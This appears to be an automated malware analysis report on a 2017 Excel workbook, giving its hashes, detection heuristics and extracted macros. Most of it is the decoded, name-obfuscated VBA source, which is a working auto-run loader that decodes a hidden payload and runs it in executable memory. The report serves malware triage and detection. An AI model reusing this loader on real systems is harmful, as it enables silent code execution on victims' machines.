Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 16eea56ff77b309e…

MALICIOUS

Office (OLE)

38.6 KB Created: 2017-07-28 08:21:21 Authoring application: Microsoft Excel First seen: 2017-08-08
MD5: c9df1f90d5f967e0fc576d6e608f3d5d SHA-1: 0606f5e39a9a4630d3a5eefbcb66753ecb04e0f6 SHA-256: 16eea56ff77b309e3ccb05866af0568dbd0dff1483ca3bd81cc3101568656ebc
78 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

This Excel file contains both Excel 4.0 (XLM) and VBA macros, indicating a multi-stage macro execution. The presence of VirtualAlloc and CreateThread API calls within the VBA code suggests the macro is designed to allocate memory and execute shellcode. The XLM macro sheet is likely used to initiate the VBA execution, which in turn attempts to run arbitrary code. The specific payload is not discernible from the provided evidence, but the techniques strongly suggest a downloader or dropper.

Heuristics 6

  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
        zusLgpmnSqWIkTqmzFBWXwM
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
        Document_Open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 172 bytes
SHA-256: 63d3437f0ef9d6e6f7cafadd6a5473d8826a0decff0e7e519719b73893f4ae2d
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Makro
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4987 bytes
SHA-256: 97f04808fe3de70e14cefb084c1c7cac5219c49666756b24d8a9ffb8b1a6e152
Detection
ClamAV: No threats found
Obfuscation or payload: likely
39 of 72 identifiers look randomly generated (e.g. 'WbxcRgSnTwdnaxFKtVhxTvMRjrBluSvDEfWrDsez') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "BuÇalışmaKitabı"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

#If VBA7 Then
Private Declare PtrSafe Function LvXrHSsspKtugtHIuojcTBJU Lib "kernel32" Alias "CreateThread" (ByVal NOPxZYGSIsmsaczVClYO As Long, ByVal zFWAuYwrkmf As Long, ByVal UuNSRFN As LongPtr, mSeyTYafswZFWuojTWEakAxghmgHM As Long, ByVal LFkQaG As Long, yHvXqYOmAjAgEYUaM As Long) As LongPtr
Private Declare PtrSafe Function dFBieQEycplChZCFYJdS Lib "kernel32" Alias "VirtualAlloc" (ByVal dHScmOaRnG As Long, ByVal zcTXWXTwuKxmSBhathuzPNJDJHad As LongPtr, ByVal DFtezRRnY As Long, ByVal AhzyAGvZBfNHKThgMt As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal npXPmRfditJp As LongPtr, ByVal uFUspoiWoHyYwVVAXsfyXLm As LongPtr, ByVal rnHvCnGSPameYOQxkt As String, ByVal HyQPVjDkbDQPJtracHNuabGiwIRCi As LongPtr, ByRef HoELEeAxLmZcEoYkDL As LongPtr) As LongPtr
#Else
Private Declare Function LvXrHSsspKtugtHIuojcTBJU Lib "kernel32" Alias "CreateThread"  (ByVal NOPxZYGSIsmsaczVClYO As Long, ByVal zFWAuYwrkmf As Long, ByVal UuNSRFN As Long, mSeyTYafswZFWuojTWEakAxghmgHM As Long, ByVal LFkQaG As Long, yHvXqYOmAjAgEYUaM As Long) As Long
Private Declare Function dFBieQEycplChZCFYJdS Lib "kernel32" Alias "VirtualAlloc" (ByVal dHScmOaRnG As Long, ByVal zcTXWXTwuKxmSBhathuzPNJDJHad As Long, ByVal DFtezRRnY As Long, ByVal AhzyAGvZBfNHKThgMt As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal npXPmRfditJp As Long, ByVal uFUspoiWoHyYwVVAXsfyXLm As Long, ByVal rnHvCnGSPameYOQxkt As String, ByVal HyQPVjDkbDQPJtracHNuabGiwIRCi As Long, ByRef HoELEeAxLmZcEoYkDL As Long) As Long
#End If

Const YEUUUNRbyRGkUxkqSsiF = &H1000
Const VoVpxgg = &H40

Public Sub zusLgpmnSqWIkTqmzFBWXwM()
    Dim fkqDnSPXlFagQS() As Byte

    fkqDnSPXlFagQS = JTLKPgCBxelgPAAhnMxeQGT(ActiveWorkbook.FullName)
    Dim IwJTmJmLvL As String
    IwJTmJmLvL = StrConv(fkqDnSPXlFagQS, 64)
    
    Dim LDZpPdHYFWZIaZBZwESjwGsSAo
    LDZpPdHYFWZIaZBZwESjwGsSAo = Split(IwJTmJmLvL, "WbxcRgSnTwdnaxFKtVhxTvMRjrBluSvDEfWrDsezPibbFoAUqfyoajmBoFSzEGSabzJUAnhaQIILtLmURHUpugDuSudYzEV")

    Dim AKTzVRtglYWQXzRmqJ As String
    Dim adstqWbaRhqxrEzTFWcavJps As String
    Dim QTKiWcVRsnJeLAJRqjty As String
    adstqWbaRhqxrEzTFWcavJps = StrConv(StrConv(LDZpPdHYFWZIaZBZwESjwGsSAo(UBound(LDZpPdHYFWZIaZBZwESjwGsSAo)), 64), 128)
    QTKiWcVRsnJeLAJRqjty = Mid$(adstqWbaRhqxrEzTFWcavJps, 3, Len(adstqWbaRhqxrEzTFWcavJps))

    AKTzVRtglYWQXzRmqJ = tZUjEQCItrOaMAdr("qaagFFtcYxxsA", QTKiWcVRsnJeLAJRqjty)
    
    #If VBA7 Then
        Dim gXAowajuZheXnSbhoFSA As LongPtr
        Dim GUHrzcqYEwHKvrUgVyxaVT As LongPtr
    #Else
        Dim gXAowajuZheXnSbhoFSA As Long
        Dim GUHrzcqYEwHKvrUgVyxaVT As Long
    #End If

    gXAowajuZheXnSbhoFSA = dFBieQEycplChZCFYJdS(0, Len(AKTzVRtglYWQXzRmqJ), YEUUUNRbyRGkUxkqSsiF, VoVpxgg)
    GUHrzcqYEwHKvrUgVyxaVT = NtWriteVirtualMemory(-1, gXAowajuZheXnSbhoFSA, AKTzVRtglYWQXzRmqJ, Len(AKTzVRtglYWQXzRmqJ), 0)
    GUHrzcqYEwHKvrUgVyxaVT = LvXrHSsspKtugtHIuojcTBJU(0, 0, gXAowajuZheXnSbhoFSA, 0, 0, 0)
End Sub

Public Function JTLKPgCBxelgPAAhnMxeQGT(ByVal bAOVKEucjMFJ As String) As Byte()
    Dim adstqWbaRhqxrEzTFWcavJps As Long
    Dim QTKiWcVRsnJeLAJRqjty() As Byte
    adstqWbaRhqxrEzTFWcavJps = FreeFile
    If LenB(Dir(bAOVKEucjMFJ)) Then
        Open bAOVKEucjMFJ For Binary Access Read As adstqWbaRhqxrEzTFWcavJps
        ReDim QTKiWcVRsnJeLAJRqjty(LOF(adstqWbaRhqxrEzTFWcavJps) - 1&) As Byte
        Get adstqWbaRhqxrEzTFWcavJps, , QTKiWcVRsnJeLAJRqjty
        Close adstqWbaRhqxrEzTFWcavJps
    Else
        Err.Raise 53
    End If
    JTLKPgCBxelgPAAhnMxeQGT = QTKiWcVRsnJeLAJRqjty
    Erase QTKiWcVRsnJeLAJRqjty
End Function

Public Sub Document_Open()
    zusLgpmnSqWIkTqmzFBWXwM
End Sub

Sub Workbook_Open()
    Document_Open
End Sub

Public Function tZUjEQCItrOaMAdr(VfuGYrQOUwtiezVTjwTQYslsiY As String, UdZZGzyoodRvIduJtjzoRSgDdjBS As String) As String
    Dim TcxZvVLVwMIGlHQrbl As Long
    Dim DIRjIKecWwWwYFMubuvmhJO As String
    Dim wQIGkqlbYOoTbSOprTOzAqKbznPW As Integer, chzVDFRK As Integer, a As Long

    For TcxZvVLVwMIGlHQrbl = 1 To Len(UdZZGzyoodRvIduJtjzoRSgDdjBS)
        a = TcxZvVLVwMIGlHQrbl Mod Len(VfuGYrQOUwtiezVTjwTQYslsiY)
        If a = 0 Then a = Len(VfuGYrQOUwtiezVTjwTQYslsiY)
        
        wQIGkqlbYOoTbSOprTOzAqKbznPW = Asc(Mid$(UdZZGzyoodRvIduJtjzoRSgDdjBS, TcxZvVLVwMIGlHQrbl, 1))
        chzVDFRK = Asc(Mid$(VfuGYrQOUwtiezVTjwTQYslsiY, a, 1))
        DIRjIKecWwWwYFMubuvmhJO = DIRjIKecWwWwYFMubuvmhJO + Chr(wQIGkqlbYOoTbSOprTOzAqKbznPW Xor chzVDFRK)
    Next TcxZvVLVwMIGlHQrbl
    
   tZUjEQCItrOaMAdr = DIRjIKecWwWwYFMubuvmhJO
End Function